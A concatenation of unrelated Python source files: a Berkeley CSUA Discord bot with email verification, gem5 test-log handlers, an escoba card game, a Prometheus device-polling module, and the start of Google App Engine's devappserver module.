HOSER_ROLE_ID = config("TEST_ROLE", default=785418569412116513, cast=int) # Verified
DEBUG_CHANNEL_ID = config("DEBUG_CHANNEL", default=788989977794707456, cast=int)
TIMEOUT_SECS = 10
logger = logging.getLogger(__name__)
class CSUAClient(discord.Client):
async def on_ready(self):
print(f"{self.user} has connected to Discord")
self.is_phillip = self.user.id == CSUA_PHILBOT_CLIENT_ID
if self.is_phillip:
self.csua_guild = get(self.guilds, id=CSUA_GUILD_ID)
self.test_channel = get(self.csua_guild.channels, id=DEBUG_CHANNEL_ID)
self.hoser_role = get(self.csua_guild.roles, id=HOSER_ROLE_ID)
async def verify_member_email(self, user):
channel = user.dm_channel
def check_msg(msg):
return msg.channel == channel
got_email = False
while not got_email:
msg = await self.wait_for("message", check=check_msg)
try:
validate_email(msg.content)
if "@berkeley.edu" in msg.content:
got_email = True
await channel.send(
f"Sending a an email to verify {user.name} to {msg.content}"
)
send_verify_mail(msg.content, user.name + "#" + user.discriminator)
else:
await channel.send(
f"{msg.content} is not a berkeley email. Please fix this"
)
except ValidationError as e:
await channel.send(
f"{msg.content} is not a valid email. Please try again. Details: {e}"
)
async def on_message(self, message):
if message.author == self.user:
return
msg = message.content.lower()
if "hkn" in msg and "ieee" in msg:
await message.channel.send("Do I need to retrieve the stick?")
if "is typing" in msg:
await message.channel.send("unoriginal")
if msg.count("cpma") >= 2:
for emoji in emoji_letters("wtfiscpma"):
await message.add_reaction(emoji)
elif "based" in msg:
for emoji in emoji_letters("based"):
await message.add_reaction(emoji)
await message.add_reaction("😎")
elif "tree" in msg or "stanford" in msg or "stanfurd" in msg:
emoji = unicodedata.lookup(
"EVERGREEN TREE"
) # todo: add official <:tree:744335009002815609>
await message.add_reaction(emoji)
elif "drip" in msg or "👟" in msg or "🥵" in msg:
for emoji in emoji_letters("drip"):
await message.add_reaction(emoji)
await message.add_reaction("👟")
if "!xkcd" in msg:
# Validate "!xkcd" command
if xkcd.is_valid_xkcd_command(msg):
await xkcd.get_xkcd(message)
else:
await message.channel.send(
"Please ensure that your command is properly formatted. Type `!xkcd -help` for more information."
)
if message.content.startswith("!figlet "):
text = message.content.split(" ", 1)[1]
if len(text) > 200:
await message.channel.send("!figlet: Message too long")
return
formatted = figlet_format(text)
# Discord has a 2000 character limit
if len(formatted) > 1994:
await message.channel.send("!figlet: Message too long")
return
await message.channel.send(f"```{formatted}```")
async def on_member_join(self, member):
msg = await member.send(
"Welcome to the CSUA discord server! First, read the rules in #landing-zone. Thumbs up this message if you agree"
)
await self.test_channel.send(f"Sent initial discord message to {member}")
def check_thumb(react, _):
return react.message == msg and str(react.emoji) == "👍" # thumbs
await self.wait_for("reaction_add", check=check_thumb)
await self.test_channel.send(f"{member} read rules")
await member.send(
"Verify your berkeley.edu email to gain access. First, please type your email. Please contact a moderator if you have any issues."
)
await self.test_channel.send(f"{member} was prompted for email")
await self.verify_member_email(member)
if self.is_phillip:
await self.test_channel.send(f"{member} was sent registration email")
def emoji_letters(chars):
return [unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}") for c in chars]
class CSUABot:
"""
Wraps CSUAClient by abstracting thread and event loop logic.
All the discord.Client coroutines must be called using
`asyncio.run_coroutine_threadsafe` because the client is running inside an
event loop in a separate thread. Event loops are one per-thread, and Django
can't handle async code, so a separate thread is used instead.
"""
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self.running = True
self.thread.start()
def _start(self):
asyncio.set_event_loop(self.loop)
self.client = CSUAClient(intents=intents)
try:
self.loop.run_until_complete(self.client.start(TOKEN))
finally:
self.loop.run_until_complete(self.client.logout())
self.loop.close()
def promote_user_to_hoser(self, tag):
if not hasattr(self.client, "csua_guild"):
client = self.client
print(client)
member = self.client.csua_guild.get_member_named(tag)
if member:
asyncio.run_coroutine_threadsafe(
member.add_roles(self.client.hoser_role), self.loop
).result(TIMEOUT_SECS)
asyncio.run_coroutine_threadsafe(
self.client.test_channel.send(f"verified {tag}"), self.loop
).result(TIMEOUT_SECS)
return True
return False
if TOKEN:
csua_bot = CSUABot()
else:
csua_bot = None
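# --- Illustrative sketch (not part of the bot) -------------------------------
# The CSUABot docstring above describes the pattern this module relies on: an
# event loop running in a dedicated thread, with synchronous code handing it
# coroutines via asyncio.run_coroutine_threadsafe.  The guarded toy below
# demonstrates only that pattern and has nothing to do with Discord.
if __name__ == "__main__":
    _demo_loop = asyncio.new_event_loop()
    threading.Thread(target=_demo_loop.run_forever, daemon=True).start()

    async def _demo_greet(name):
        return f"hello {name}"

    # Submitted from synchronous code, exactly as promote_user_to_hoser does.
    _demo_future = asyncio.run_coroutine_threadsafe(_demo_greet("hoser"), _demo_loop)
    print(_demo_future.result(TIMEOUT_SECS))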
|
handlers.py
|
# Copyright (c) 2017 Mark D. Hill and David A. Wood
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Sean Wilson
'''
Handlers for the testlib Log.
'''
from __future__ import print_function
import multiprocessing
import os
import Queue
import sys
import threading
import time
import traceback
import helper
import log
import result
import state
import test
import terminal
from config import config, constants
class _TestStreamManager(object):
def __init__(self):
self._writers = {}
def open_writer(self, test_result):
if test_result in self._writers:
            raise ValueError('Cannot have multiple writers on a single test.')
self._writers[test_result] = _TestStreams(test_result.stdout,
test_result.stderr)
def get_writer(self, test_result):
if test_result not in self._writers:
self.open_writer(test_result)
return self._writers[test_result]
def close_writer(self, test_result):
if test_result in self._writers:
writer = self._writers.pop(test_result)
writer.close()
def close(self):
for writer in self._writers.values():
writer.close()
self._writers.clear()
class _TestStreams(object):
def __init__(self, stdout, stderr):
helper.mkdir_p(os.path.dirname(stdout))
helper.mkdir_p(os.path.dirname(stderr))
self.stdout = open(stdout, 'w')
self.stderr = open(stderr, 'w')
def close(self):
self.stdout.close()
self.stderr.close()
class ResultHandler(log.Handler):
'''
    Log handler which listens for test results and output, saving data as
    it is reported.
When the handler is closed it writes out test results in the python pickle
format.
'''
def __init__(self, schedule, directory):
'''
:param schedule: The entire schedule as a :class:`LoadedLibrary`
object.
:param directory: Directory to save test stdout/stderr and aggregate
results to.
'''
self.directory = directory
self.internal_results = result.InternalLibraryResults(schedule,
directory)
self.test_stream_manager = _TestStreamManager()
self._closed = False
self.mapping = {
log.LibraryStatus.type_id: self.handle_library_status,
log.SuiteResult.type_id: self.handle_suite_result,
log.TestResult.type_id: self.handle_test_result,
log.TestStderr.type_id: self.handle_stderr,
log.TestStdout.type_id: self.handle_stdout,
}
def handle(self, record):
if not self._closed:
self.mapping.get(record.type_id, lambda _:None)(record)
def handle_library_status(self, record):
if record['status'] in (state.Status.Complete, state.Status.Avoided):
self.test_stream_manager.close()
def handle_suite_result(self, record):
suite_result = self.internal_results.get_suite_result(
record['metadata'].uid)
suite_result.result = record['result']
def handle_test_result(self, record):
test_result = self._get_test_result(record)
test_result.result = record['result']
def handle_stderr(self, record):
self.test_stream_manager.get_writer(
self._get_test_result(record)
).stderr.write(record['buffer'])
def handle_stdout(self, record):
self.test_stream_manager.get_writer(
self._get_test_result(record)
).stdout.write(record['buffer'])
def _get_test_result(self, test_record):
return self.internal_results.get_test_result(
test_record['metadata'].uid,
test_record['metadata'].suite_uid)
def _save(self):
#FIXME Hardcoded path name
result.InternalSavedResults.save(
self.internal_results,
os.path.join(self.directory, constants.pickle_filename))
result.JUnitSavedResults.save(
self.internal_results,
os.path.join(self.directory, constants.xml_filename))
def close(self):
if self._closed:
return
self._closed = True
self._save()
def unsuccessful(self):
'''
        Performs an OR reduction over all of the results.
        Returns True if at least one test is unsuccessful, False when all
        tests pass.
'''
for suite_result in self.internal_results:
if suite_result.unsuccessful:
return True
# If all are successful, then this wasn't "unsuccessful"
return False
#TODO Change from a handler to an internal post processor so it can be used
# to reprint results
class SummaryHandler(log.Handler):
'''
A log handler which listens to the log for test results
and reports the aggregate results when closed.
'''
color = terminal.get_termcap()
reset = color.Normal
colormap = {
state.Result.Errored: color.Red,
state.Result.Failed: color.Red,
state.Result.Passed: color.Green,
state.Result.Skipped: color.Cyan,
}
sep_fmtkey = 'separator'
sep_fmtstr = '{%s}' % sep_fmtkey
def __init__(self):
self.mapping = {
log.TestResult.type_id: self.handle_testresult,
log.LibraryStatus.type_id: self.handle_library_status,
}
self._timer = helper.Timer()
self.results = []
def handle_library_status(self, record):
if record['status'] == state.Status.Building:
self._timer.restart()
def handle_testresult(self, record):
result = record['result'].value
if result in (state.Result.Skipped, state.Result.Failed,
state.Result.Passed, state.Result.Errored):
self.results.append(result)
def handle(self, record):
self.mapping.get(record.type_id, lambda _:None)(record)
def close(self):
print(self._display_summary())
def _display_summary(self):
most_severe_outcome = None
outcome_fmt = ' {count} {outcome}'
strings = []
outcome_count = [0] * len(state.Result.enums)
for result in self.results:
outcome_count[result] += 1
# Iterate over enums so they are in order of severity
for outcome in state.Result.enums:
outcome = getattr(state.Result, outcome)
count = outcome_count[outcome]
if count:
strings.append(outcome_fmt.format(count=count,
outcome=state.Result.enums[outcome]))
most_severe_outcome = outcome
string = ','.join(strings)
if most_severe_outcome is None:
string = ' No testing done'
most_severe_outcome = state.Result.Passed
else:
string = ' Results:' + string + ' in {:.2} seconds '.format(
self._timer.active_time())
string += ' '
return terminal.insert_separator(
string,
color=self.colormap[most_severe_outcome] + self.color.Bold)
class TerminalHandler(log.Handler):
color = terminal.get_termcap()
verbosity_mapping = {
log.LogLevel.Warn: color.Yellow,
log.LogLevel.Error: color.Red,
}
default = color.Normal
def __init__(self, verbosity=log.LogLevel.Info, machine_only=False):
self.stream = verbosity >= log.LogLevel.Trace
self.verbosity = verbosity
self.machine_only = machine_only
self.mapping = {
log.TestResult.type_id: self.handle_testresult,
log.SuiteStatus.type_id: self.handle_suitestatus,
log.TestStatus.type_id: self.handle_teststatus,
log.TestStderr.type_id: self.handle_stderr,
log.TestStdout.type_id: self.handle_stdout,
log.TestMessage.type_id: self.handle_testmessage,
log.LibraryMessage.type_id: self.handle_librarymessage,
}
def _display_outcome(self, name, outcome, reason=None):
print(self.color.Bold
+ SummaryHandler.colormap[outcome]
+ name
+ ' '
+ state.Result.enums[outcome]
+ SummaryHandler.reset)
if reason is not None:
log.test_log.info('')
log.test_log.info('Reason:')
log.test_log.info(reason)
log.test_log.info(terminal.separator('-'))
def handle_teststatus(self, record):
if record['status'] == state.Status.Running:
log.test_log.debug('Starting Test Case: %s' %\
record['metadata'].name)
def handle_testresult(self, record):
self._display_outcome(
'Test: %s' % record['metadata'].name,
record['result'].value)
def handle_suitestatus(self, record):
if record['status'] == state.Status.Running:
log.test_log.debug('Starting Test Suite: %s ' %\
record['metadata'].name)
def handle_stderr(self, record):
if self.stream:
print(record.data['buffer'], file=sys.stderr, end='')
def handle_stdout(self, record):
if self.stream:
print(record.data['buffer'], file=sys.stdout, end='')
def handle_testmessage(self, record):
if self.stream:
print(self._colorize(record['message'], record['level']))
def handle_librarymessage(self, record):
if not self.machine_only or record.data.get('machine_readable', False):
print(self._colorize(record['message'], record['level'],
record['bold']))
def _colorize(self, message, level, bold=False):
return '%s%s%s%s' % (
self.color.Bold if bold else '',
self.verbosity_mapping.get(level, ''),
message,
self.default)
def handle(self, record):
if record.data.get('level', self.verbosity) > self.verbosity:
return
self.mapping.get(record.type_id, lambda _:None)(record)
def set_verbosity(self, verbosity):
self.verbosity = verbosity
class PrintHandler(log.Handler):
def __init__(self):
pass
def handle(self, record):
print(str(record).rstrip())
def close(self):
pass
class MultiprocessingHandlerWrapper(log.Handler):
'''
A handler class which forwards log records to subhandlers, enabling
logging across multiprocessing python processes.
The 'parent' side of the handler should execute either
:func:`async_process` or :func:`process` to forward
log records to subhandlers.
'''
def __init__(self, *subhandlers):
        # Create a thread to spin handling receipt of messages
# Create queue to push onto
self.queue = multiprocessing.Queue()
self.queue.cancel_join_thread()
self._shutdown = threading.Event()
# subhandlers should be accessed with the _handler_lock
self._handler_lock = threading.Lock()
self._subhandlers = subhandlers
def add_handler(self, handler):
self._handler_lock.acquire()
self._subhandlers = (handler, ) + self._subhandlers
self._handler_lock.release()
def _with_handlers(self, callback):
exception = None
self._handler_lock.acquire()
for handler in self._subhandlers:
# Prevent deadlock when using this handler by delaying
# exception raise until we get a chance to unlock.
try:
callback(handler)
except Exception as e:
exception = e
break
self._handler_lock.release()
if exception is not None:
raise exception
def async_process(self):
self.thread = threading.Thread(target=self.process)
self.thread.daemon = True
self.thread.start()
def process(self):
while not self._shutdown.is_set():
try:
item = self.queue.get(timeout=0.1)
self._handle(item)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
return
except Queue.Empty:
continue
def _drain(self):
while True:
try:
item = self.queue.get(block=False)
self._handle(item)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
return
except Queue.Empty:
return
def _handle(self, record):
self._with_handlers(lambda handler: handler.handle(record))
def handle(self, record):
self.queue.put(record)
def _close(self):
if hasattr(self, 'thread'):
self.thread.join()
_wrap(self._drain)
self._with_handlers(lambda handler: _wrap(handler.close))
        # NOTE Python2 has a known bug which causes IOErrors to be raised
# if this shutdown doesn't go cleanly on both ends.
# This sleep adds some time for the sender threads on this process to
# finish pickling the object and complete shutdown after the queue is
# closed.
time.sleep(.2)
self.queue.close()
time.sleep(.2)
def close(self):
if not self._shutdown.is_set():
self._shutdown.set()
self._close()
def _wrap(callback, *args, **kwargs):
try:
callback(*args, **kwargs)
except:
traceback.print_exc()
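# --- Illustrative usage sketch (not part of testlib) -------------------------
# Per the MultiprocessingHandlerWrapper docstring above, the 'parent' side
# pushes records in with handle() and drains them to subhandlers via
# async_process()/process().  The guarded toy below wires it to the
# PrintHandler defined in this file; any picklable object works as a record
# for PrintHandler since it only str()s what it receives.
if __name__ == '__main__':
    _wrapper = MultiprocessingHandlerWrapper(PrintHandler())
    _wrapper.async_process()           # start the draining thread
    _wrapper.handle('example record')  # forwarded to PrintHandler.handle
    _wrapper.close()                   # drain the queue, close subhandlers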
|
broom.py
|
#!/usr/bin/env python3
import random
from collections import namedtuple
from typing import List
from itertools import combinations
from functools import reduce
import threading
import time
import simple_app
# from .simple_app import playround  # unused; this relative import fails when broom.py is run as a script
thread = threading.Thread(target=simple_app.playround)
thread.start()
result_available = threading.Event()
result = None
Card = namedtuple("Card", ['suit', 'face', 'owner'])
faces = list(range(1,11))
suits = ['B', 'O', 'E', 'C']
def make_deck():
return { str(n) + s: Card(suit=s, face=n, owner='') for n in faces for s in suits }
CardStore = make_deck()
def make_deck_from(card_ids :list):
return { card_id: CardStore[card_id] for card_id in card_ids }
def shuffle(deck :list):
random.shuffle(deck)
return deck
def get_escombinations(cards: set, pivot: str):
combos = set()
#combos.add(frozenset(cards | set([pivot])))
for i in range(len(cards)):
r = len(cards) + 1 - i # combinatorial order (from the 5 choose 'x' where 'x' is order)
combs = combinations(cards | set([pivot]),r)
for combo in combs:
combo_vals = [CardStore[c].face for c in combo ]
if ( pivot in combo # pivot card is the player's card - has to be part of combo
and sum(combo_vals) == 15 # only plays that add to 15 are considered, all other plays are equivalent to laying down card on table
or r > len(cards) ):
combos.add(combo)
return combos
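# Worked example (illustrative): with table cards {'5O', '3B'} and pivot card
# '7C' from the player's hand, get_escombinations() keeps ('7C', '5O', '3B')
# because 7 + 5 + 3 == 15 -- the escoba rule checked above.  Combos that miss
# the pivot or do not sum to 15 are dropped, except for the full table+pivot
# combination admitted by the r > len(cards) branch.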
class Deck:
card_store = {}
deck_order = []
def __init__(self,card_store={}):
self.card_store = card_store
self.deck_order = list(card_store.keys())
random.shuffle(self.deck_order)
print("Hello deck {}".format(self.deck_order))
def shuffle(self):
return random.shuffle(self.deck_order)
def deal(self, n=1, owner=''):
d = self.deck_order[:n]
self.deck_order = self.deck_order[n:]
return set(d)
# def update_store(card,store, owner):
# store.owner = owner
# return store[card]
# return [update_store(delt,self.card_store, owner) for delt in d]
def cards(self):
return self.card_store
def order(self):
return self.deck_order
class Player:
score = 0
hand = set()
name = ''
def __init__(self, name, hand=[]):
self.name = name
def play_turn(self,deck):
return NotImplemented
def new_hand(self, cards):
self.hand = cards
def award_point(self, points=1):
self.score += points
def get_play(self, playable: list, table_cards=[]):
play = set()
if len(playable) == 0: # never happens
play.add(random.choice(list(self.hand))) # no playable because table_cards were probably empty so play random card
else:
play = playable
#for card in play:
#if card in self.hand:
#self.hand.discard(card)
if len(play) > 1 :
good_hands = [p for p in play if sum([CardStore[c].face for c in p]) == 15 ]
if len(good_hands) > 0:
return random.choice(good_hands)
return random.choice(list(play))
return play.pop()
class Game:
deck = Deck()
pl1 = Player('p1')
pl2 = Player('p2')
table_cards = set()
def __init__(self, pl1, pl2, deck=Deck()):
self.pl1 = pl1
self.pl2 = pl2
self.deck = deck
print("Start game")
#return NotImplemented
def set_card_owner(self, card, owner):
c = self.deck.cards()[card]
self.deck.cards()[card] = Card(suit=c.suit, face=c.face, owner=owner)
def reset_deck(self):
self.deck = Deck(make_deck())
def deal_hand(self):
p1 = set()
p2 = set()
print(len(self.deck.order()))
# deal out to p1 and p2 alternating 3 each
for count in range(0,3):
[ p1.add(d) for d in self.deck.deal()]
[ p2.add(d) for d in self.deck.deal()]
print(len(self.deck.order()))
return p1,p2
def deal_start(self):
p1,p2 = self.deal_hand()
start_table_cards = self.deck.deal(4)
return p1,p2,start_table_cards
def valid_plays(self, player, table_cards: set):
# visible_cards = [card for card_id, card in self.deck.cards.items() if (card.owner == 'table') ]
plays = set()
for card in player.hand:
if (len(table_cards) > 0):
combo_cards = set(table_cards)
escombinations = get_escombinations(combo_cards,card)
for combo in escombinations:
plays.add(combo)
else:
plays.add(tuple(player.hand))
return plays
def apply_play(self,play, player):
# validate(play)
playable = self.valid_plays(player, self.table_cards)
scored = False
t_cards = self.table_cards
#p_cards = play.pop()
p_cards = play
if p_cards in playable:
if isinstance(p_cards,str):
card_values = [self.deck.card_store[p_cards].face]
else:
card_values = [self.deck.card_store[c].face for c in p_cards ]
# assign card owners
s = sum(card_values)
if ( s == 15):
scored = True
for card in p_cards:
self.set_card_owner(card, player.name)
if card in self.table_cards:
self.table_cards.discard(card)
else:
if isinstance(p_cards, str):
self.table_cards.update({p_cards})
else:
self.table_cards.update(p_cards)
for card in p_cards:
if card in player.hand:
player.hand.discard(card)
if not self.table_cards:
player.award_point() #escoba
print(f"{player.name} Escoba!")
self.print_score()
return scored
def apply_score(self):
p1_total = set()
p1_oros = set()
p1_sevens = set()
p2_total = set()
p2_sevens = set()
p2_oros = set()
for card_id, card in self.deck.cards().items():
if (card.owner == self.pl1.name):
p1_total.add(card_id)
if card.suit == 'O': p1_oros.add(card_id)
if card.face == 7: p1_sevens.add(card_id)
else:
p2_total.add(card_id)
if card.suit == 'O': p2_oros.add(card_id)
if card.face == 7: p2_sevens.add(card_id)
if card_id == '7O':
self.pl1.award_point() if card.owner == self.pl1.name else self.pl2.award_point()
if len(p1_total) > len(p2_total):
self.pl1.award_point()
elif len(p2_total) > len(p1_total):
self.pl2.award_point()
if len(p1_oros) > len(p2_oros):
self.pl1.award_point()
elif len(p2_oros) > len(p1_oros):
self.pl2.award_point()
if len(p1_sevens) > len(p2_sevens):
self.pl1.award_point()
elif len(p2_sevens) > len(p1_sevens):
self.pl2.award_point()
print(f'Points:\tPL1\tPL2\nOros:\t[{len(p1_oros)}]\t[{len(p2_oros)}]\nSevens:\t[{len(p1_sevens)}]\t[{len(p2_sevens)}]\nCards:\t[{len(p1_total)}]\t[{len(p2_total)}]')
def play_round(self, first_player, second_player):
p1_cards, p2_cards ,table_cards = self.deal_start()
first_player.new_hand(p1_cards)
second_player.new_hand(p2_cards)
self.table_cards = table_cards
last_scored = ''
cards_left = len(self.deck.order())
while len(self.deck.order()) > 0:
if len(first_player.hand) == 0 and len(second_player.hand) == 0:
p1_cards, p2_cards = self.deal_hand()
first_player.new_hand(p1_cards)
second_player.new_hand(p2_cards)
cards_left = len(self.deck.order())
# hand per player
while (len(first_player.hand) + len(second_player.hand) > 0):
if (len(first_player.hand)):
playable = self.valid_plays(first_player,self.table_cards)
play = first_player.get_play(playable)
if self.apply_play(play,first_player): last_scored = first_player.name
if (len(second_player.hand)):
playable = self.valid_plays(second_player,self.table_cards)
play = second_player.get_play(playable)
if self.apply_play(play,second_player): last_scored = second_player.name
while not result_available.wait(timeout=120):
print('waiting for user input')
print(result)
print(play)
# award last_player_to_score remaining cards
[self.set_card_owner(card_id, last_scored) for card_id, card in self.deck.cards().items() if card.owner == '']
self.apply_score()
def print_score(self):
print("Player 1 score: {}\nPlayer 2 score: {}".format(self.pl1.score, self.pl2.score))
if __name__ == "__main__":
p1 = Player('player_1')
p2 = Player('player_2')
deck = Deck(make_deck())
g = Game(p1,p2,deck)
rounds = 0
while (p1.score < 15 and p2.score < 15):
rounds += 1
g.reset_deck()
if (rounds % 2 == 1):
g.play_round(p1,p2)
else:
g.play_round(p2,p1)
print("Round {}:\n\tPlayer 1 score: {}\n\tPlayer 2 score: {}".format(rounds, p1.score, p2.score))
|
Device.py
|
import abc
from prometheus_client import Gauge
from threading import Thread
import time
import signal
class PromVar:
def __init__(self, name, description=""):
self.name = name
self.value = None
self.description = description
self.lastUpdate_ms = int(time.time() * 1000)
self.status = 0
self.error = ""
self.prom = Gauge(name, description)
def setValue(self, value):
self.value = value
self.prom.set(value)
self.status = 1
self.error = ""
self.lastUpdate_ms = int(time.time() * 1000)
def setStatus(self, status, error=""):
self.status = status
self.error = error
def getValue(self):
return self.value
def getVariableSummary(self):
summary = dict()
summary["name"] = self.name
summary["value"] = self.getValue()
summary["description"] = self.description
summary["lastUpdate_ms"] = self.lastUpdate_ms
summary["status"] = self.status
summary["error"] = self.error
return summary
class Device(abc.ABC):
def __init__(self, name):
self.name = name
#self.namespace_prefix = ""
self.poll_loop_ms = 2000
self.variables = dict()
self._keep_running = True
self._loop_thread = Thread(target=self._loop_handler, daemon=True)
def addVariable(self, name, description=""):
self.variables[name] = PromVar(name, description)
def getVariableValue(self, name):
if self.variables.get(name) is not None:
return self.variables[name].getValue()
else:
return None
def getAllVariablesSummary(self):
var_list = []
for key, value in self.variables.items():
var_list.append( value.getVariableSummary() )
return var_list
def setVariableValue(self, name, value):
if self.variables.get(name) is not None:
self.variables[name].setValue(value)
def setVariableStatus(self, name, status, error=""):
if self.variables.get(name) is not None:
self.variables[name].setStatus(status, error)
def hasVar(self, name):
        return self.variables.get(name) is not None
def _loop_handler(self):
print("Starting Loop cycle for device", self.name)
while self._keep_running:
self.loop()
time.sleep(self.poll_loop_ms / 1000)
def is_alive(self):
return self._loop_thread.is_alive()
def stop(self):
self._keep_running = False
self.cleanup()
@abc.abstractmethod
def loop(self):
pass
@abc.abstractmethod
def write(self, name, value):
"""
Parameters
----------
name : str
            variable name that has been requested
value : any
variable value that has to be written
"""
pass
@abc.abstractmethod
def cleanup(self):
pass
listOfDevices = []
def addDevice(device):
listOfDevices.append(device)
def StartDevicesLoop():
for dev in listOfDevices:
try:
dev._loop_thread.start()
print("Started loop for device - ",dev.name)
except:
print("Failed to start loop for device - ",dev.name)
def getDeviceWithVar(name):
device = None
for dev in listOfDevices:
if dev.hasVar(name):
device = dev
break
return device
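# --- Illustrative sketch (not part of the original module) -------------------
# Device is abstract: a concrete device only needs loop(), write() and
# cleanup().  The hypothetical subclass below polls a single demo gauge; it is
# defined but never registered, so it has no effect unless used as shown in
# the commented lines at the end.
class _DummyDevice(Device):
    def __init__(self):
        super().__init__("dummy")
        self.addVariable("dummy_counter", "monotonic demo counter")
        self._count = 0

    def loop(self):
        # Called every poll_loop_ms by _loop_handler().
        self._count += 1
        self.setVariableValue("dummy_counter", self._count)

    def write(self, name, value):
        # Nothing is writable on this demo device.
        pass

    def cleanup(self):
        pass

# Usage (commented out to avoid side effects at import time):
#   addDevice(_DummyDevice())
#   StartDevicesLoop()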
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from concurrent import futures
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_server
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import health_check_service
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import vm_runtime_factory
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
_MAX_UPLOAD_MEGABYTES = 32
_MAX_UPLOAD_BYTES = _MAX_UPLOAD_MEGABYTES * 1024 * 1024
_MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES = 64 * 1024 * 1024
_REDIRECT_HTML = '''\
<HTML><HEAD><meta http-equiv="content-type" content="%(content-type)s">
<TITLE>%(status)d Moved</TITLE></HEAD>
<BODY><H1>%(status)d Moved</H1>
The document has moved
<A HREF="%(correct-url)s">here</A>.
</BODY></HTML>'''
_TIMEOUT_HTML = '<HTML><BODY>503 - This request has timed out.</BODY></HTML>'
# Factor applied to the request timeouts to compensate for the
# long vm_engine reloads. TODO: eventually remove this once we have
# optimized the vm_engine reload.
_VMENGINE_SLOWDOWN_FACTOR = 2
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
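# Illustrative example (not part of the upstream source; the handler list is
# hypothetical): for an app.yaml with a static_files handler whose upload
# pattern is r'static/.*\.css' and a static_dir handler for 'images', this
# helper would build a single anchored alternation roughly like
#   r'^(static/.*\.css)|(images\/.*)$'
# (re.escape inserts the backslash before the path separator). Handlers marked
# application_readable are skipped so their files remain visible to the
# runtime.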
